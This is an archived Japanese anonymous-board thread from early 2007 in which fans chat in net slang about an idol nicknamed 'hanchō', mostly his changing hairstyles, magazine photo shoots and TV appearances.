162 :ユー&名無しネ:2007/01/28(日) 21:39:02 ID:KDKB2pvq
エクステストレート班長にヤラレて初めて蛇煮に興味を持った自分が通りますよ

163 :ユー&名無しネ:2007/01/28(日) 22:11:04 ID:Gxu5CzyN
こうやってみると班長いろんな髪型してるん棚(w

164 :ユー&名無しネ:2007/01/29(月) 16:50:42 ID:6r1+IVOj
今の玉山鉄二タソの髪型がヒカ碁班長っぽい(w

165 :ユー&名無しネ:2007/01/29(月) 17:45:28 ID:CXoHPJqI
穴座ゴツゴツオノコハリネズミメガネ葉っぱ隊班長で落ちた自分が通りますよ

166 :ユー&名無しネ:2007/01/29(月) 21:30:29 ID:zHb+pJLG
班長が真っ黒にしたのって03冬が最後だっけ

167 :ユー&名無しネ:2007/01/30(火) 14:17:35 ID:EK3vOBBr
℃っくんになりたい
彼女な目線で班長に見つめられる℃っくんになりたいヽ(`Д´)ノ

168 :ユー&名無しネ:2007/01/30(火) 15:29:09 ID:GfiCEwAf

きもいんだよ

169 :ユー&名無しネ:2007/01/30(火) 21:28:49 ID:xW09+KhC
ttp://d.hatena.ne.jp/sakumayu/
佐久間麻由のブログ

安田との関係ありなキーワードいっぱい
・RIZE
・トリッキー

170 :ユー&名無しネ:2007/01/30(火) 21:30:01 ID:xW09+KhC
ttp://d.hatena.ne.jp/sakumayu/
佐久間麻由のブログ

安田との関係ありなキーワードいっぱい
・RIZE
・トリッキー

171 :ユー&名無しネ:2007/01/31(水) 17:42:12 ID:I8J6weU2
班長の髪型がカバエくて同じのにしたいのだが
オナゴでも似合う班長髪型はあるの可能?

172 :ユー&名無しネ:2007/01/31(水) 18:01:42 ID:pbBHCBhg
>171
スピの班長髪型もしくは05栗紺もいいとオモ
でも髪型似せたことにより逆に違いがハキーリして
落ち込む可能性アリ

173 :ユー&名無しネ:2007/01/31(水) 23:04:54 ID:2qxyEWE6
テレライの班長ハァ━━━━*´Д`*━━━━ン!!!!
次号もwktk

174 :ユー&名無しネ:2007/01/31(水) 23:59:45 ID:tln+Hc+h
>171
オナゴ向きじゃないが穴座ヘアなら多少似合わなくても諦めは付くぞ(w

175 :ユー&名無しネ:2007/02/01(木) 00:25:17 ID:UczNmAuj
℃エス姐さんktkr(w

176 :ユー&名無しネ:2007/02/01(木) 00:32:15 ID:boYP/yU+
>174
姐さん(ノ∀`)

177 :ユー&名無しネ:2007/02/01(木) 10:46:01 ID:PedusIwT
諦めはつくだろうが取り返しがつかなくなりそうだ(w

178 :ユー&名無しネ:2007/02/01(木) 11:24:32 ID:XFAMZDFa
一年ほど前はずっとオナゴを参考にしてきたはずだから
寧ろオナゴのほうが似合うものもあるはずだと信じたい

179 :ユー&名無しネ:2007/02/01(木) 11:31:04 ID:lijpSgYd
自分05年くるくる班長ヘアーだが美容師さんにオナゴっぽくなりましたねって言われました
班長マジック(´∀`*)

180 :ユー&名無しネ:2007/02/01(木) 17:14:29 ID:Jdk9MY0Y
姐さん方d!
ハリネズミは遠慮しておきますが
エキサイトや雨青(゚∀゚)あたりの班長にしてみたいとオモ
アドバイスd!

181 :ユー&名無しネ:2007/02/01(木) 18:18:28 ID:boYP/yU+
班長どうしたの班長

182 :ユー&名無しネ:2007/02/01(木) 18:22:55 ID:LDPecu57
絵文字がついてない班長なんて…


183 :ユー&名無しネ:2007/02/01(木) 18:28:50 ID:l2I+adXQ
日本語チンパなのはいつもの事として
最後の自嘲気味なハハッがなんだか心配だ

184 :ユー&名無しネ:2007/02/01(木) 18:31:16 ID:6WBmLtkh
班長どうしたんだろう
何か溜め込んで考え込んでるんじゃないかと心配になるよ(´・ω・`)

185 :ユー&名無しネ:2007/02/01(木) 18:44:48 ID:nQ473g0P
チト班長のことが心配だけどきっと大丈夫
来週にはまた絵文字満載のになるよ

186 :ユー&名無しネ:2007/02/01(木) 18:49:28 ID:PedusIwT
周期的というかたまにこんな感じになる事あるよな
こうやって吐き出してまたいつもの班長に戻ってくれればヨシクソ

187 :ユー&名無しネ:2007/02/01(木) 19:00:18 ID:+ZNkFqjp
相方が服の事書いてたから班長のと間違えたかと思ったよ
来週はいつもの班長に戻ってるといいな(´・ω・`)

188 :ユー&名無しネ:2007/02/01(木) 20:06:36 ID:g7Gp4YIx
テレビとかでマッチさんの新曲を聞くと勝手に脳内班長が踊りだす

189 :ユー&名無しネ:2007/02/01(木) 21:45:29 ID:FQdGOlZY
>188
ノシノシ
マッチさんの後ろに班長の幻影が見える(w

190 :ユー&名無しネ:2007/02/02(金) 03:37:39 ID:8jcFTBnv
花より男子2のオグリタソの髪型が班長に見えてしまうんだが(ノ∀`)

191 :ユー&名無しネ:2007/02/02(金) 05:10:27 ID:6JJqk0h5
今朝のスポーツ紙にこんな記事がぁりましたゎ
http://e.pic.to/3dxnw

192 :ユー&名無しネ:2007/02/02(金) 10:54:54 ID:PixBOska
>>191
見れない

193 :ユー&名無しネ:2007/02/02(金) 11:20:50 ID:mXoDbAsp
>191
注意

194 :ユー&名無しネ:2007/02/02(金) 17:10:40 ID:xwtV0HGd
>188
(*´∀`)ノシノシノシ
あの踊りまたいつか見れたらいいな

195 :ユー&名無しネ:2007/02/05(月) 18:17:33 ID:PP2E95ye
ちょ、す余計な事吹き込まないでクレヨンorz
もうじゃが芋は卒業したって班長の言葉を信じるぞ班長。・゚・(ノД`)・゚・。

196 :ユー&名無しネ:2007/02/05(月) 18:46:22 ID:X67JGGn8
>195
穴座班長だいしてる自分は姐さんとは意見が合いそうにないな(w
髪型というかあの漢なふいんき(ryがスチだ

197 :ユー&名無しネ:2007/02/05(月) 18:47:37 ID:+pAMY9T0
穴座班長は穴座班長でスチですが
思い出の中でじっとしていてホスィです

198 :ユー&名無しネ:2007/02/05(月) 20:09:02 ID:oraSLkXT
>197
ノシ

199 :ユー&名無しネ:2007/02/05(月) 21:30:02 ID:/XHpwcJc
http://www.h2studio.com/images/20041211/01.jpg
細木数子の開運ヌード


200 :ユー&名無しネ:2007/02/05(月) 21:43:54 ID:YmuU2lAq
>197
ノシノシ

201 :ユー&名無しネ:2007/02/05(月) 22:02:59 ID:jkAMWXBY
姐さん方は思い出にしまっておきたい派
が多数みたいで何故か嬉しい

202 :ユー&名無しネ:2007/02/05(月) 22:14:09 ID:QHCZYOsp
ここ最近のビスが安定してカ○゙エエだけに突然穴座班長になられたら途惑いが隠せナスビ(ノД`)

203 :ユー&名無しネ:2007/02/05(月) 22:16:37 ID:pSllWYpP
穴座班長は…今のキャラに合うのかと小一時間(ry

204 :ユー&名無しネ:2007/02/05(月) 22:35:02 ID:JON2nDk0
穴座班長でキャハッ☆はイヤン

205 :ユー&名無しネ:2007/02/05(月) 22:50:32 ID:HhqYKXPy
でも最近オノコ班長の時もあるから分からナス

ある日突然完全オノコ班長になる鴨試練

206 :ユー&名無しネ:2007/02/05(月) 22:53:15 ID:SH/4kApp
もし今の班長が穴座ヘヤーになったら確実に心臓止まる

207 :ユー&名無しネ:2007/02/05(月) 23:49:53 ID:jkAMWXBY
芋と同じ髪型にした姐さんが哀れでならない

208 :ユー&名無しネ:2007/02/06(火) 00:44:46 ID:WxtIUlb7
>207
お帰りください

209 :ユー&名無しネ:2007/02/06(火) 00:47:44 ID:lO3n2klc
穴座ヘアにオノコキャラ→班長の醍醐味モヘ
穴座以降のユニセクスヘアにオノコキャラ→ギャップモヘ
穴座以降のユニセクスヘアにキャハ☆キャラ→悔しいがモヘ
穴座ヘアにキャハ☆キャラ→未知の世界

興味はあるが興味本位で足を踏み入れるにはチト怖い(w
しかし襟足バッサリ短めヘアなら禿しく見てみたい

210 :ユー&名無しネ:2007/02/06(火) 00:53:45 ID:vsbCumbC
好奇心旺盛な自分は5ふんでいいから穴座ヘラ見てみたい

211 :ユー&名無しネ:2007/02/06(火) 00:55:32 ID:vsbCumbC
○分
×ふん

スマソ

212 :ユー&名無しネ:2007/02/06(火) 00:59:08 ID:EyvyajBX
ヘラがじわじわくる(w

213 :ユー&名無しネ:2007/02/06(火) 13:07:58 ID:pHA89arq
この際だから言ってしまおう
キャハ穴座芋を見てみたい(w

214 :ユー&名無しネ:2007/02/06(火) 13:10:35 ID:pHA89arq
○班長
×芋

スマスorz

215 :ユー&名無しネ:2007/02/06(火) 13:34:05 ID:atceIIta
>214
スマスって…
ダブルチンパ発生ジャマイカ!

216 :ユー&名無しネ:2007/02/06(火) 13:44:29 ID:zQnu8p2z
みさえヘアの時くらいの襟足に長め前髪センター分けな班長見てみたいな
パーマはかけずサラサラストレートで

217 :ユー&名無しネ:2007/02/06(火) 15:10:05 ID:hMOPWnMu
>213
同じくノシ
リアルに二丁目にいそうな班長wktk

218 :ユー&名無しネ:2007/02/06(火) 21:56:46 ID:BVoWQfo7
NHKの大河の篤姫に大倉忠義決定

219 :ユー&名無しネ:2007/02/07(水) 10:43:36 ID:ejh+CRfM
ジミに両手トレビアーンしてた班長モヘ

220 :ユー&名無しネ:2007/02/07(水) 14:15:42 ID:02DYk0Gy
片目誌の班長ハァ━━━━*´Д`*━━━━ン!!!

221 :ユー&名無しネ:2007/02/08(木) 14:22:41 ID:MaOXZYhT
班長黒メッシュmjdk

222 :ユー&名無しネ:2007/02/08(木) 16:16:06 ID:su/L4Fra
>221
kwsk

223 :ユー&名無しネ:2007/02/08(木) 18:14:58 ID:qMUhQxi8
写真久しぶり(*´∀`)
班長が元気ならピンクでも緑でも何でもいいや

224 :ユー&名無しネ:2007/02/08(木) 19:31:54 ID:MaOXZYhT
>222
自分の友が最近班長見かけた時に黒メッシュっぽい髪型だったラスィんだが
チン男見たところまだ美容院には行ってないみたいだし
多分友はプリンがメッシュに見えたんだろう、はやとちりスマソ

225 :ユー&名無しネ:2007/02/08(木) 20:11:09 ID:MtFg9Wu9
アレ?班長レギンスだっけ?
レンギスじゃなかったっけ?

226 :ユー&名無しネ:2007/02/08(木) 23:13:06 ID:ULYBvEO/
ガイドの予告見るとメッシュと言えばメッシュに見えなくもない

227 :ユー&名無しネ:2007/02/09(金) 06:04:57 ID:6lQG/wr/
片目誌伝言板がもし実現したら班長コレと升コレの融合になるのか



((((;゚д゚))))

228 :ユー&名無しネ:2007/02/09(金) 18:52:39 ID:BomLrVQM
FINE BOYSのふんわり班長にアンニュイ班長_ト ̄|〇

229 :ユー&名無しネ:2007/02/09(金) 21:46:08 ID:1fOGzKdw
>228
ノシノシ
ビズ安定しすぎてて怖いくらい
ごいすカバエエ(*´∀`)

230 :ユー&名無しネ:2007/02/10(土) 14:46:17 ID:3XAlbLiz
髪型も表情も衣装もテラカコヨス(*´∀`)

231 :ユー&名無しネ:2007/02/10(土) 21:54:09 ID:qSlVlPb6
最近の班長のビズ最高で最強だよな
特にFINEBOYS班長全部にモヘ

232 :ユー&名無しネ:2007/02/11(日) 09:45:44 ID:lAHyuIT9
>231
ノシ

233 :ユー&名無しネ:2007/02/11(日) 17:44:48 ID:Q0hEt+kG
FINE BOYSのビズやばすぎる
自分クリンクリンしてる頃の髪型スチだったから尚更(*´∀`)

234 :ユー&名無しネ:2007/02/11(日) 20:43:09 ID:2rnQ1Q6d
こうなったらアンケート送って表紙と巻頭特集ナモナモしてくる
スタイリストとカメラマンはそのまんま希望で(*´∀`)

235 :ユー&名無しネ:2007/02/12(月) 13:16:05 ID:V/sKfU65
FINE BOYSテラカコヨス
自分もアンケート送るノシ
ついでにいつか美男単独表紙もナモナモ

236 :ユー&名無しネ:2007/02/12(月) 13:44:13 ID:u61OCJSj
少し前の班長のビズならzipperあたりかと思ったが
今のビズなら安心してメンズ雑誌に推せるな

237 :ユー&名無しネ:2007/02/12(月) 14:21:24 ID:WgKaKt5T
表紙なんて贅沢は言わないから
今回みたいなのがまたあればいいな(*´∀`)

238 :ユー&名無しネ:2007/02/12(月) 19:38:25 ID:E7rPVjFr
zipperいいな…
班コレを堪能できそう

239 :ユー&名無しネ:2007/02/13(火) 22:59:31 ID:P3beDIMl
今日の本見て班長の舌出し顔がスチなのに気付いた

240 :ユー&名無しネ:2007/02/14(水) 20:18:51 ID:ArmsVIRb
テレライの班長
次々飛び出す℃M発言・・・・・_| ̄|●~

241 :ユー&名無しネ:2007/02/14(水) 22:06:24 ID:c8wMYjIZ
班長より手がデカかったなんて言えない

班長の手が小さいのか自分の手が大きいのかorz

242 :ユー&名無しネ:2007/02/15(木) 00:26:49 ID:GvlWwI2e
背も低く手も小さい自分と同じ位って
班長どんだけ手小さいんだよ(w
それでギター弾けてるのスゴス

243 :ユー&名無しネ:2007/02/15(木) 02:13:31 ID:DaBHFg73
http://img173.auctions.yahoo.co.jp/users/7/6/2/7/pjjps406-img410x580-1171377453img705.jpg

244 :ユー&名無しネ:2007/02/16(金) 16:31:21 ID:NbBWa+74
オリスタで久々に正しい班長コレを見た気ガス(w

245 :ユー&名無しネ:2007/02/17(土) 22:08:36 ID:iocF+fcZ
>244
色も奇抜じゃなくてカバエエと思った自分って(ノ∀`)

246 :ユー&名無しネ:2007/02/17(土) 23:47:13 ID:F3FJkq8G
自分はそれより親分との足の(ry

247 :ユー&名無しネ:2007/02/18(日) 01:03:21 ID:VlGWk+4z
親分と座高が同(ry

248 :ユー&名無しネ:2007/02/19(月) 22:27:55 ID:7ygCpkwU
班長の半ケツktkr

249 :ユー&名無しネ:2007/02/21(水) 20:29:23 ID:1hw8PPU6
ジョンもガイドも班長ビズ良すぎ(*´∀`)

250 :ユー&名無しネ:2007/02/21(水) 20:31:55 ID:k+ORYGU8
焼き係な班長wktk

251 :ユー&名無しネ:2007/02/21(水) 20:58:42 ID:m2N+9iVL
スカの班長は全く存在感ないからな(ノ∀`)

252 :ユー&名無しネ:2007/02/21(水) 21:37:08 ID:ns8ZWrni
最近のビズがあまりにも良過ぎてドチドチが止まらない(*´∀`)
何があったの班長

253 :ユー&名無しネ:2007/02/22(木) 16:02:11 ID:UH7UxDU2
なるトモで議長がケーキのロウソクを吹き消す時に
後ろで一緒にフーしてる班長がテラカバエエ_| ̄|〇

254 :ユー&名無しネ:2007/02/22(木) 16:24:16 ID:o5TsPJi2
>253
あれテラモエスだよな(*´∀`)

255 :ユー&名無しネ:2007/02/22(木) 16:49:03 ID:TlfSlBmK
ネイチャー焼肉は班長ビズ最高で最強なので
姐さん方お見逃しなく

256 :ユー&名無しネ:2007/02/22(木) 17:07:37 ID:UPqSdhla
>253
ノシ

257 :ユー&名無しネ:2007/02/22(木) 20:45:42 ID:23wutRaE
>255
BS組なのでwktkして待ってますノシ

258 :ユー&名無しネ:2007/02/23(金) 12:43:54 ID:lBgHU+s3
今更ながらジョンの本Pコメにホコーリ(*´∀`)
前も同じようなこと言ってくれてたけどやっかし嬉しいな

38 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)